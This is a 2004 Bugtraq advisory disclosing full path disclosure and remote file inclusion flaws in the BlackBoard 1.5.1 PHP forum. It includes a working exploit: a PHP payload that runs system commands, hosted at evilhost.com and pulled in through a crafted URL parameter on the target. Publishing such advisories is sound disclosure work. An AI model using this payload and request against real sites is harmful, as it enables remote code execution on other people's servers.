[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Multiple vulnerabilities in BlackBoard
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Multiple vulnerabilities in BlackBoard
- From: Lin Xiaofeng <Cracklove@xxxxxxxxx>
- Date: 6 Oct 2004 10:56:43 -0000
Multiple vulnerabilities in BlackBoard
**********************************
*AuThor:Cracklove *
*emA!l:Cracklove[at]Gmail[dot]Com*
*HoMePaGe:http://ProxySky.com *
**********************************
[Info]
Website: http://blackboard.unclassified.de
Version: 1.5.1,Maybe prior
Problem: Full path disclosure,Include file
[Vuls]
1.Full path disclosure:
Let's try to request like this:
http://target/bb_lib/checkdb.inc.php
and we get standard error messages like that:
Warning: main(lang/_more.php): failed to open stream: No such file or directory
in /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15
Fatal error: main(): Failed opening required 'lang/_more.php'
(include_path='.:/usr/local/lib/php') in
/www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15
The Problem also in admin.inc.php,cp.inc.php etc.
2.Include file
Ok let's open ./bb_lib/admin.inc.php,We see
require($libpath . 'lang/' . $LANG . '_more.php');
Bingo!It is include vul!
[Exploit]
For example, if I had access to place files in a webspace
http://evilhost.com/,I would create a directory "lang" and place
inside it a script called _more.php with content like the following:
<?
system("uname -a;id;ls -al");
?>
If we then make a request to the target machine like the following:
http://target/bb_lib/checkdb.inc.php?libpach=http://evilhost.com/
The code should be retrieved and executed.
[Fix]
Maybe a patch will release later.
[Greetings]
Greets To Xon,fatb,Envymask,h886,ToToDoDo And to all people in China.